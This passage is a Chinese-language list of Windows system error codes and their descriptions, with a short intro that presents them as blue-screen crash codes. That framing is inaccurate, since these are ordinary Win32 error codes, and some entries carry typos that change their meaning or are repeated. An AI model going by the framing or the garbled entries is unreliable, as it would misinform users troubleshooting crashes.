1821 0x071D 要求的认证层次不被支持。 
1822 0x071E 没有登记任何主要的名称。 
1823 0x071F 指定的错误不是有效的 Windows RPC 错误码。 
1824 0x0720 A UUID that is valid only on this computer has been allocated. 
1825 0x0721 发生安全包装指定错误。 
1826 0x0722 没有取消执行绪 (THREAD) 
1827 0x0723 针对编码/译码的代码进行无效的作业。 
1828 0x0724 Incompatible version of the serializing package. 
1829 0x0725 不兼容的 RPC stub 版本。 
1898 0x076A 找不到群组成员。 
1899 0x076B 无法建立 endpoint mapper 数据库。 
1900 0x076C The object universal unique identifier (UUID) is the nil UUID. 
1901 0x076D 指定的项目无效。 
1902 0x076E 指定窗体名称错误。 
1903 0x076F 指定的窗体大小错误。 
1904 0x0770 指定的打印机句柄已经在等候。 
1905 0x0771 指定的打印机已经删除 
1906 0x0772 打印机的状态错误。 
1907 0x0773 使用者在第一次登入之前,必须先变更它的密码。 
1908 0x0774 找不到这个网域的域控制器。 
1909 0x0775 参照的帐户目前被锁定,无法登入。 
2000 0x07D0 像素格式无效。 
2001 0x07D1 指定的驱动程序无效。 
2002 0x07D2 窗口样式或 class 属性对这项作业无效。 
2003 0x07D3 不支持所要求的中继文件作业。 
2004 0x07D4 不支持要求的传输作业。 
2005 0x07D5 不支持要求的剪辑作业。 
2005 0x07D5 不支持要求的剪辑作业。 
2202 0x089A 指定的使用者名称无效。 
2250 0x08CA 网络联机不存在。 
2401 0x0961 这个网络联机已经开启档案或者要求暂停。 
2402 0x0962 现行的联机仍然存在。 
2404 0x0964 装置正在使用中,无法中断联机。 
3000 0x0BB8 指定的打印机监视器不详。 
3001 0x0BB9 指定的打印机驱动程序正在使用中。 
3002 0x0BBA 找不到排存盘。 
3003 0x0BBB 没有发出 StartDocPrinter 呼叫。 
3004 0x0BBC 没有发出 AddJob 呼叫。 
3005 0x0BBD 指定的打印处理器已经安装。 
3006 0x0BBE 指定打印监控程序已经安装。 
4000 0x0FA0 在处理指令时,WINS 发生错误。 
4001 0x0FA1 无法删除区域的 WINS。 
4002 0x0FA2 The importation from the file failed. 
4003 0x0FA3 制作备份失败。以前执行过完整的备份吗? 
4004 0x0FA4 无法制作备份,请检查目录。 
4005 0x0FA5 名称不在 WINS 数据库中。 
4006 0x0FA6 不可用未设定的打印机来取代。 
6118 0x17E6 这个工作群组的服务清单目前无法使用. 

使用Windows出现蓝色屏幕是经常的事,而且每每因为不清楚错误的来源而频繁重新安装系统,劳神费时。下列收集了一些Windows死机密码,供大家参考。 

0x0000 操作完成 
0x0001 不正确的函数 
0x0002 系统找不到指定的文件 
0x0003 系统找不到指定的路径 
0x0004 系统无法打开文件 
0x0005 拒绝存取 
0x0006 无效的代码 
0x0007 内存控制模块已损坏 
0x0008 内存空间不足,无法处理这个指令 
0x0009 内存控制模块地址无效 
0x000a 环境不正确 
0x000b 尝试载入一个格式错误的程序 
0x000c 存取码错误 
0x000d 资料错误 
0x000e 内存空间不够,无法完成这项操作 
0x000f 系统找不到制定的硬盘 
0x0010 无法移除目录 
0x0011 系统无法将文件移到其他的硬盘 
0x0012 没有任何文件 
0x0019 找不到指定的扇区或磁道 
0x001a 指定的磁盘或磁片无法存取 
0x001b 磁盘找不到要求的扇区 
0x001c 打印机没有纸 
0x001d 系统无法将资料写入制定的磁盘 
0x001e 系统无法读取指定的装置 
0x001f 连接到系统的某个装置没有作用 
0x0021 文件的一部分被锁定 
0x0024 开启的分享文件数量太多 
0x0026 到达文件结尾 
0x0027 磁盘已满 
0x0036 网络繁忙 
0x003b 网络发生意外的错误 
0x0043 网络名称找不到 
0x0050 文件已经存在 
0x0052 无法建立目录或文件 
0x0053 int24失败 
0x006b 因为代用的磁盘尚未插入,所以程序已经停止 
0x006c 磁盘正在使用中或被锁定 
0x006f 文件名太长 
0x0070 硬盘空间不足 
0x007f 找不到指定的程序 
0x045b 系统正在关机 
0x045c 无法种植系统关机,因为没有关机的动作在进行中 
0x046a 可用服务器储存空间不足,无法处理这项指令 
0x047e 指定的程序需要新的Windows版本 
0x047f 指定的程序不是Windows或MS-DOS程序 
0x0480 指定的程序已经启动,无法再启动一次 
0x0481 指定的程序是为旧版的Windows所写的 
0x0482 执行此应用程序所需的程序库文件之一毁坏 
0x0483 没有应用程序与此项操作的指定文件建立关联 
0x0484 传送指令到应用程序发生错误 
0x04b0 指定的装置名称无效 
0x05a2 窗口不是子窗口 
0x05aa 系统资源不足,无法完成所要求的服务 
0x05ab 系统子还不足,无法完成所需要的服务 
0x05ac 系统资源不足,无法完成所要求的服务 
0x06b9 资源不足,无法完成操作